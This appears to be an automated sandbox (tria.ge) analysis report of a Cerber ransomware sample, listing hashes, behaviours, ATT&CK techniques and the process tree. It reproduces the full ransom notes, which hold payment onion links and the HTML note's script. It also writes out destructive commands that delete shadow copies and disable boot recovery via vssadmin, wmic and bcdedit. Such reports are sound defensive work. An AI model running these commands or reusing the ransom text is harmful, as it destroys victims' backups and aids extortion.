Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

db402b152a...69.exe

windows7-x64

10

db402b152a...69.exe

windows10-2004-x64

10

$PLUGINSDI...ns.dll

windows7-x64

3

$PLUGINSDI...ns.dll

windows10-2004-x64

3

$PLUGINSDI...em.dll

windows7-x64

3

$PLUGINSDI...em.dll

windows10-2004-x64

3

HelpButton.dll

windows7-x64

3

HelpButton.dll

windows10-2004-x64

3

Resubmissions

26/02/2025, 06:49

250226-hld2lswm14 10

25/02/2025, 05:58

250225-gn5fxa1ls9 10

Analysis

  • max time kernel
    120s
  • max time network
    105s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    25/02/2025, 05:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669.exe

  • Size

    261KB

  • MD5

    927635549829f48f929ead0fc59dcb84

  • SHA1

    7c21f900ac8c3ca5311a77a591f002494ad7d85b

  • SHA256

    db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669

  • SHA512

    db1672765f4cdb8faa6bfd7ae993ad27e8b4f25a894d9883624aae80bd33ae2bcb3c8d91e91961f10c8f714e2507766586759362e292b4a6e6f1ade6cf485c0a

  • SSDEEP

    6144:hwHysO+xpuZUVW3CHI4eHKerKFY/pavGOX3MCefFIu:KO+xpBVgeeHKerTRavfXcJfR

Score
10/10
cerberdefense_evasiondiscoveryevasionexecutionimpactpersistenceransomwarespywarestealertrojan

Malware Config

Extracted

Path

C:\Users\Admin\Documents\# DECRYPT MY FILES #.txt

Ransom Note
C_E_R_B_E_R R_A_N_S_O_M_W_A_R_E ######################################################################### Cannot you find the files you need? Is the content of the files that you looked for not readable??? It is normal because the files' names, as well as the data in your files have been encrypted. Great! You have turned to be a part of a big community "#Cerb3r Ransomware". ######################################################################### !!! If you are reading this message it means the software "Cerber" has !!! been removed from your computer. !!! HTML instruction ("# DECRYPT MY FILES #.html") always contains a !!! working domain of your personal page! ######################################################################### What is encryption? ------------------- Encryption is a reversible modification of information for security reasons but providing full access to it for authorized users. To become an authorized user and keep the modification absolutely reversible (in other words to have a possibility to decrypt your files) you should have an individual private key. But not only it. It is required also to have the special decryption software (in your case "Cerber Decryptor" software) for safe and complete decryption of all your files and data. ######################################################################### Everything is clear for me but what should I do? ------------------------------------------------ The first step is reading these instructions to the end. Your files have been encrypted with the "Cerber Ransomware" software; the instructions ("# DECRYPT MY FILES #.html" and "# DECRYPT MY FILES #.txt") in the folders with your encrypted files are not viruses, they will help you. After reading this text the most part of people start searching in the Internet the words the "Cerber Ransomware" where they find a lot of ideas, recommendations and instructions. It is necessary to realize that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them. !!! Any attempts to return your files with the third-party tools can !!! be fatal for your encrypted files. The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files. Finally it will be impossible to decrypt your files. When you make a puzzle, but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly. You should realize that any intervention of the third-party software to restore files encrypted with the "Cerber Ransomware" software may be fatal for your files. ######################################################################### !!! There are several plain steps to restore your files but if you do !!! not follow them we will not be able to help you, and we will not try !!! since you have read this warning already. ######################################################################### For your information the software to decrypt your files (as well as the private key provided together) are paid products. After purchase of the software package you will be able to: 1. decrypt all your files; 2. work with your documents; 3. view your photos and other media; 4. continue your usual and comfortable work at the computer. If you understand all importance of the situation then we propose to you to go directly to your personal page where you will receive the complete instructions and guarantees to restore your files. ######################################################################### There is a list of temporary addresses to go on your personal page below: _______________________________________________________________________ | | 1. http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5 | | 2. http://bqyjebfh25oellur.onion.cab/D692-738D-BB43-0072-C1D5 | | 3. http://bqyjebfh25oellur.onion.nu/D692-738D-BB43-0072-C1D5 | | 4. http://bqyjebfh25oellur.onion.link/D692-738D-BB43-0072-C1D5 | | 5. http://bqyjebfh25oellur.tor2web.org/D692-738D-BB43-0072-C1D5 |_______________________________________________________________________ ######################################################################### What should you do with these addresses? ---------------------------------------- If you read the instructions in TXT format (if you have instruction in HTML (the file with an icon of your Internet browser) then the easiest way is to run it): 1. take a look at the first address (in this case it is http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5); 2. select it with the mouse cursor holding the left mouse button and moving the cursor to the right; 3. release the left mouse button and press the right one; 4. select "Copy" in the appeared menu; 5. run your Internet browser (if you do not know what it is run the Internet Explorer); 6. move the mouse cursor to the address bar of the browser (this is the place where the site address is written); 7. click the right mouse button in the field where the site address is written; 8. select the button "Insert" in the appeared menu; 9. then you will see the address http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5 appeared there; 10. press ENTER; 11. the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address if falling. If for some reason the site cannot be opened check the connection to the Internet; if the site still cannot be opened take a look at the instructions on omitting the point about working with the addresses in the HTML instructions. If you browse the instructions in HTML format: 1. click the left mouse button on the first address (in this case it is http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5); 2. in a new tab or window of your web browser the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address. If for some reason the site cannot be opened check the connection to the Internet. ######################################################################### Unfortunately these sites are short-term since the antivirus companies are interested in you do not have a chance to restore your files but continue to buy their products. Unlike them we are ready to help you always. If you need our help but the temporary sites are not available: 1. run your Internet browser (if you do not know what it is run the Internet Explorer); 2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER; 3. wait for the site loading; 4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed; 5. run Tor Browser; 6. connect with the button "Connect" (if you use the English version); 7. a normal Internet browser window will be opened after the initialization; 8. type or copy the address ________________________________________________________ | | | http://bqyjebfh25oellur.onion/D692-738D-BB43-0072-C1D5 | |________________________________________________________| in this browser address bar; 9. press ENTER; 10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again. If you have any problems during installation or operation of Tor Browser, please, visit https://www.youtube.com/ and type request in the search bar "install tor browser windows" and you will find a lot of training videos about Tor Browser installation and operation. If TOR address is not available for a long period (2-3 days) it means you are late; usually you have about 2-3 weeks after reading the instructions to restore your files. ######################################################################### Additional information: You will find the instructions for restoring your files in those folders where you have your encrypted files only. The instructions are made in two file formats - HTML and TXT for your convenience. Unfortunately antivirus companies cannot protect or restore your files but they can make the situation worse removing the instructions how to restore your encrypted files. The instructions are not viruses; they have informative nature only, so any claims on the absence of any instruction files you can send to your antivirus company. ######################################################################### Cerber Ransomware Project is not malicious and is not intended to harm a person and his/her information data. The project is created for the sole purpose of instruction regarding information security, as well as certification of antivirus software for their suitability for data protection. Together we make the Internet a better and safer place. ######################################################################### If you look through this text in the Internet and realize that something is wrong with your files but you do not have any instructions to restore your files, please, contact your antivirus support. ######################################################################### Remember that the worst situation already happened and now it depends on your determination and speed of your actions the further life of your files.
URLs

http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5

http://bqyjebfh25oellur.onion.cab/D692-738D-BB43-0072-C1D5

http://bqyjebfh25oellur.onion.nu/D692-738D-BB43-0072-C1D5

http://bqyjebfh25oellur.onion.link/D692-738D-BB43-0072-C1D5

http://bqyjebfh25oellur.tor2web.org/D692-738D-BB43-0072-C1D5

http://bqyjebfh25oellur.onion/D692-738D-BB43-0072-C1D5

Extracted

Path

C:\Users\Admin\Documents\# DECRYPT MY FILES #.html

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>&#067;erber &#082;ansomware</title> <style> a { color: #47c; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #333; font-family: "Helvetica Neue", Helvetica, "Segoe UI", Arial, freesans, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; line-height: 1.6; margin: 0; padding: 0; } hr { background-color: #e7e7e7; border: 0 none; border-bottom: 1px solid #c7c7c7; height: 5px; margin: 30px 0; } li { padding: 0 0 7px 7px; } ol { padding-left: 3em; } .container { background-color: #fff; border: 1px solid #c7c7c7; margin: 40px; padding: 40px 40px 20px 40px; } .info, .tor { background-color: #efe; border: 1px solid #bda; display: block; padding: 0px 20px; } .logo { font-size: 12px; font-weight: bold; line-height: 1; margin: 0; } .upd_on { color: red; display: block; } .upd_off { display: none; float: left; } .tor { padding: 10px 0; text-align: center; } .url { margin-right: 5px; } .warning { background-color: #f5e7e7; border: 1px solid #ebccd1; color: #a44; display: block; padding: 15px 10px; text-align: center; } </style> </head> <body> <div class="container"> <h3>C E R B E R&nbsp;&nbsp;&nbsp;R A N S O M W A R E</h3> <hr> <p>Cannot you find the files you need?<br>Is the content of the files that you looked for not readable?</p> <p>It is normal because the files' names, as well as the data in your files have been encrypted.</p> <p>Great!<br>You have turned to be a part of a big community "#C3rber Ransomware".</p> <hr> <p><span class="warning">If you are reading this message it means the software "Cerber" has been removed from your computer.</span></p> <hr> <h3>What is encryption?</h3> <p>Encryption is a reversible modification of information for security reasons but providing full access to it for authorized users.</p> <p>To become an authorized user and keep the modification absolutely reversible (in other words to have a possibility to decrypt your files) you should have an individual private key.</p> <p>But not only it.</p> <p>It is required also to have the special decryption software (in your case "Cerber Decryptor" software) for safe and complete decryption of all your files and data.</p> <hr> <h3>Everything is clear for me but what should I do?</h3> <p>The first step is reading these instructions to the end.</p> <p>Your files have been encrypted with the "Cerber Ransomware" software; the instructions ("# DECRYPT MY FILES #.html" and "# DECRYPT MY FILES #.txt") in the folders with your encrypted files are not viruses, they will help you.</p> <p>After reading this text the most part of people start searching in the Internet the words the "Cerber Ransomware" where they find a lot of ideas, recommendations and instructions.</p> <p>It is necessary to realize that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them.</p> <p><span class="warning">!Any attempts to get back your files with the third-party tools can be fatal for your encrypted files!</span></p> <p>The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files.</p> <p>Finally it will be impossible to decrypt your files!</p> <p>When you make a puzzle, but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly.</p> <p>You should realize that any intervention of the third-party software to restore files encrypted with the "Cerber Ransomware" software may be fatal for your files.</p> <hr> <p><span class="warning">There are several plain steps to restore your files but if you do not follow them we will not be able to help you, and we will not try since you have read this warning already.</span></p> <hr> <p>For your information the software to decrypt your files (as well as the private key provided together) are paid products.</p> <p>After purchase of the software package you will be able to:</p> <ol> <li>decrypt all your files;</li> <li>work with your documents;</li> <li>view your photos and other media;</li> <li>continue your usual and comfortable work at the computer.</li> </ol> <p>If you understand all importance of the situation then we propose to you to go directly to your personal page where you will receive the complete instructions and guarantees to restore your files.</p> <hr> <div class="info"> <p>There is a list of temporary addresses to go on your personal page below:</p> <ol> <li><span class="upd_off" id="upd_1">Please wait...</span><a class="url" href="http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5" id="url_1" target="_blank">http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5</a>(<a href="#updateUrl" onClick="return updateUrl();" style="color: red;">Get a NEW address!</a>)</li> <li><a href="http://bqyjebfh25oellur.onion.cab/D692-738D-BB43-0072-C1D5" target="_blank">http://bqyjebfh25oellur.onion.cab/D692-738D-BB43-0072-C1D5</a></li> <li><a href="http://bqyjebfh25oellur.onion.nu/D692-738D-BB43-0072-C1D5" target="_blank">http://bqyjebfh25oellur.onion.nu/D692-738D-BB43-0072-C1D5</a></li> <li><a href="http://bqyjebfh25oellur.onion.link/D692-738D-BB43-0072-C1D5" target="_blank">http://bqyjebfh25oellur.onion.link/D692-738D-BB43-0072-C1D5</a></li> <li><a href="http://bqyjebfh25oellur.tor2web.org/D692-738D-BB43-0072-C1D5" target="_blank">http://bqyjebfh25oellur.tor2web.org/D692-738D-BB43-0072-C1D5</a></li> </ol> </div> <hr> <h3>What should you do with these addresses?</h3> <p>If you read the instructions in TXT format (if you have instruction in HTML (the file with an icon of your Internet browser) then the easiest way is to run it):</p> <ol> <li>take a look at the first address (in this case it is <span class="upd_off" id="upd_2">Please wait...</span><a class="url" href="http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5" id="url_2" target="_blank">http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5</a>);</li> <li>select it with the mouse cursor holding the left mouse button and moving the cursor to the right;</li> <li>release the left mouse button and press the right one;</li> <li>select "Copy" in the appeared menu;</li> <li>run your Internet browser (if you do not know what it is run the Internet Explorer);</li> <li>move the mouse cursor to the address bar of the browser (this is the place where the site address is written);</li> <li>click the right mouse button in the field where the site address is written;</li> <li>select the button "Insert" in the appeared menu;</li> <li>then you will see the address <span class="upd_off" id="upd_3">Please wait...</span><a class="url" href="http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5" id="url_3" target="_blank">http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5</a> appeared there;</li> <li>press ENTER;</li> <li>the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address if falling.</li> </ol> <p>If for some reason the site cannot be opened check the connection to the Internet; if the site still cannot be opened take a look at the instructions on omitting the point about working with the addresses in the HTML instructions.</p> <p>If you browse the instructions in HTML format:</p> <ol> <li>click the left mouse button on the first address (in this case it is <span class="upd_off" id="upd_4">Please wait...</span><a class="url" href="http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5" id="url_4" target="_blank">http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5</a>);</li> <li>in a new tab or window of your web browser the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address.</li> </ol> <p>If for some reason the site cannot be opened check the connection to the Internet.</p> <hr> <p>Unfortunately these sites are short-term since the antivirus companies are interested in you do not have a chance to restore your files but continue to buy their products.</p> <p>Unlike them we are ready to help you always.</p> <p>If you need our help but the temporary sites are not available:</p> <ol> <li>run your Internet browser (if you do not know what it is run the Internet Explorer);</li> <li>enter or copy the address <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> into the address bar of your browser and press ENTER;</li> <li>wait for the site loading;</li> <li>on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li> <li>run Tor Browser;</li> <li>connect with the button "Connect" (if you use the English version);</li> <li>a normal Internet browser window will be opened after the initialization;</li> <li>type or copy the address <span class="tor">http://bqyjebfh25oellur.onion/D692-738D-BB43-0072-C1D5</span> in this browser address bar;</li> <li>press ENTER;</li> <li>the site should be loaded; if for some reason the site is not loading wait for a moment and try again.</li> </ol> <p>If you have any problems during installation or operation of Tor Browser, please, visit <a href="https://www.youtube.com/results?search_query=install+tor+browser+windows" target="_blank">https://www.youtube.com/</a> and type request in the search bar "install tor browser windows" and you will find a lot of training videos about Tor Browser installation and operation.</p> <p>If TOR address is not available for a long period (2-3 days) it means you are late; usually you have about 2-3 weeks after reading the instructions to restore your files.</p> <hr> <h3>Additional information:</h3> <p>You will find the instructions for restoring your files in those folders where you have your encrypted files only.</p> <p>The instructions are made in two file formats - HTML and TXT for your convenience.</p> <p>Unfortunately antivirus companies cannot protect or restore your files but they can make the situation worse removing the instructions how to restore your encrypted files.</p> <p>The instructions are not viruses; they have informative nature only, so any claims on the absence of any instruction files you can send to your antivirus company.</p> <hr> <p>Cerber Ransomware Project is not malicious and is not intended to harm a person and his/her information data.</p> <p>The project is created for the sole purpose of instruction regarding information security, as well as certification of antivirus software for their suitability for data protection.</p> <p>Together we make the Internet a better and safer place.</p> <hr> <p>If you look through this text in the Internet and realize that something is wrong with your files but you do not have any instructions to restore your files, please, contact your antivirus support.</p> <hr> <p>Remember that the worst situation already happened and now it depends on your determination and speed of your actions the further life of your files.</p> </div> <script> function getXMLHttpRequest() { if (window.XMLHttpRequest) { return new window.XMLHttpRequest; } else { try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } } function getUrlContent(url, callback) { var xhttp = getXMLHttpRequest(); if (xhttp) { xhttp.onreadystatechange = function() { if (xhttp.readyState == 4) { if (xhttp.status == 200) { return callback(xhttp.responseText.replace(/[\s ]+/gm, ""), null); } else { return callback(null, true); } } }; xhttp.open("GET", url + '?_=' + new Date().getTime(), true); xhttp.send(); } else { return callback(null, true); } } function server1(address, callback) { getUrlContent("http://btc.blockr.io/api/v1/address/txs/" + address, function(result, error) { if (!error) { var tx = /"tx":"([\w]+)","time_utc":"[\w-:]+","confirmations":[\d]+,"amount":-/.exec(result); if (tx) { getUrlContent("http://btc.blockr.io/api/v1/tx/info/" + tx[1], function(result, error) { if (!error) { var address = /"vouts":\[{"address":"([\w]+)"/.exec(result); if (address) { return callback(address[1], null); } else { return callback(null, true); } } else { return callback(null, true); } }); } else { return callback(null, true); } } else { return callback(null, true); } }); } function server2(address, callback) { getUrlContent("http://api.blockcypher.com/v1/btc/main/addrs/" + address, function(result, error) { if (!error) { var tx = /"tx_hash":"([\w]+)","block_height":[\d]+,"tx_input_n":[\d-]+,"tx_output_n":-/.exec(result); if (tx) { getUrlContent("http://api.blockcypher.com/v1/btc/main/txs/" + tx[1], function(result, error) { if (!error) { var address = /"outputs":\[{"value":[\d]+,"script":"[\w]+","spent_by":"[\w]+","addresses":\["([\w]+)"/.exec(result); if (address) { return callback(address[1], null); } else { return callback(null, true); } } else { return callback(null, true); } }); } else { return callback(null, true); } } else { return callback(null, true); }

Signatures

  • Cerber 3 IoCs

    Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

    ransomwarecerber
  • Cerber family
    cerber
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs
    defense_evasion
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Adds policy Run key to start application 2 TTPs 2 IoCs
    persistence
  • Contacts a large (524) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    defense_evasiontrojan
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • NSIS installer 2 IoCs
    installer
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 2 IoCs
    defense_evasion
  • Modifies Control Panel 4 IoCs
    defense_evasion
  • Modifies Internet Explorer settings 1 TTPs 59 IoCs
    adwarespyware
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669.exe
    "C:\Users\Admin\AppData\Local\Temp\db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Users\Admin\AppData\Local\Temp\db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669.exe
      "C:\Users\Admin\AppData\Local\Temp\db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669.exe"
      2⤵
      • Cerber
      • Modifies visiblity of hidden/system files in Explorer
      • Adds policy Run key to start application
      • Drops startup file
      • Loads dropped DLL
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Modifies Control Panel
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2944
      • C:\Users\Admin\AppData\Roaming\{33D7A01A-D90D-3DE7-A628-AFB91CA5B4EB}\ReAgentc.exe
        "C:\Users\Admin\AppData\Roaming\{33D7A01A-D90D-3DE7-A628-AFB91CA5B4EB}\ReAgentc.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2804
        • C:\Users\Admin\AppData\Roaming\{33D7A01A-D90D-3DE7-A628-AFB91CA5B4EB}\ReAgentc.exe
          "C:\Users\Admin\AppData\Roaming\{33D7A01A-D90D-3DE7-A628-AFB91CA5B4EB}\ReAgentc.exe"
          4⤵
          • Cerber
          • Modifies visiblity of hidden/system files in Explorer
          • Adds policy Run key to start application
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Sets desktop wallpaper using registry
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Modifies Control Panel
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:552
          • C:\Windows\system32\vssadmin.exe
            "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:812
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2864
          • C:\Windows\System32\bcdedit.exe
            "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1868
          • C:\Windows\System32\bcdedit.exe
            "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1096
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\# DECRYPT MY FILES #.html
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2868
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2868 CREDAT:275457 /prefetch:2
              6⤵
              • System Location Discovery: System Language Discovery
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:3040
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2868 CREDAT:472065 /prefetch:2
              6⤵
              • System Location Discovery: System Language Discovery
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:484
          • C:\Windows\system32\NOTEPAD.EXE
            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\# DECRYPT MY FILES #.txt
            5⤵
              PID:2556
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\# DECRYPT MY FILES #.vbs"
              5⤵
                PID:2772
              • C:\Windows\system32\cmd.exe
                /d /c taskkill /f /im "ReAgentc.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\AppData\Roaming\{33D7A01A-D90D-3DE7-A628-AFB91CA5B4EB}\ReAgentc.exe" > NUL
                5⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                PID:2596
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im "ReAgentc.exe"
                  6⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:304
                • C:\Windows\system32\PING.EXE
                  ping -n 1 127.0.0.1
                  6⤵
                  • System Network Configuration Discovery: Internet Connection Discovery
                  • Runs ping.exe
                  PID:2688
          • C:\Windows\SysWOW64\cmd.exe
            /d /c taskkill /f /im "db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\AppData\Local\Temp\db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669.exe" > NUL
            3⤵
            • Deletes itself
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:2896
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669.exe"
              4⤵
              • Cerber
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2868
            • C:\Windows\SysWOW64\PING.EXE
              ping -n 1 127.0.0.1
              4⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2540
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2028
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
        1⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        PID:2992
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2992 CREDAT:275457 /prefetch:2
          2⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:3000
      • C:\Windows\SysWOW64\DllHost.exe
        C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
        1⤵
        • System Location Discovery: System Language Discovery
        PID:2828

      Network

      MITRE ATT&CK Enterprise v15

      Reconnaissance

      Resource Development

      Initial Access

      Execution

      Windows Management Instrumentation

      1
      T1047

      Persistence

      Boot or Logon Autostart Execution

      2
      T1547

      Registry Run Keys / Startup Folder

      2
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      2
      T1547

      Registry Run Keys / Startup Folder

      2
      T1547.001

      Defense Evasion

      Direct Volume Access

      1
      T1006

      Hide Artifacts

      1
      T1564

      Hidden Files and Directories

      1
      T1564.001

      Indicator Removal

      2
      T1070

      File Deletion

      2
      T1070.004

      Modify Registry

      5
      T1112

      Credential Access

      Credentials from Password Stores

      1
      T1555

      Credentials from Web Browsers

      1
      T1555.003

      Unsecured Credentials

      1
      T1552

      Credentials In Files

      1
      T1552.001

      Discovery

      Network Service Discovery

      1
      T1046

      Remote System Discovery

      1
      T1018

      System Information Discovery

      2
      T1082

      System Location Discovery

      1
      T1614

      System Language Discovery

      1
      T1614.001

      System Network Configuration Discovery

      1
      T1016

      Internet Connection Discovery

      1
      T1016.001

      Lateral Movement

      Collection

      Data from Local System

      1
      T1005

      Command and Control

      Exfiltration

      Impact

      Defacement

      1
      T1491

      Inhibit System Recovery

      3
      T1490

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        ad0f3491ce5b9d76f7fae91dd165a679

        SHA1

        34b15783695728f58e66d2438d16c771a03d3d43

        SHA256

        953763b1fcd81c55da915a5e4a44795cf300239885ee20271edf1dace22bb6c0

        SHA512

        0ce458503353e7eb1c451b7489ff09fca6a51976e46b9dd0b8055b39d8b53ee4be433bd25639bd0c02729c8b9e896458ec440d46c1fb4135e820c14e2b33b449

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        3ab31a0352e90f6ba2ff921da905f211

        SHA1

        8bcc195bd210a7a3e2ce1f9d68e1cd8e3dc654a4

        SHA256

        08ffbe983fd7935d5c69261b59a44ede0d207c8512b6422cff69345daefcee2f

        SHA512

        b7ee9b3cf323574849a116159982048768d987b90e78eb56f97f699d42f29c0cf89c4286ff9c9a0f0c3ea98fd872f036d7d697dd155cb96f6339f3da91627ad9

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        d0032e05ac5fe146ad9f383610395b1d

        SHA1

        dd2dc1bd0096133fe877f6382cbea34f07aa3767

        SHA256

        7612a30e4d264312cbc89b7cd0e94db55ee82fea24e634dc55983c3d6665bb45

        SHA512

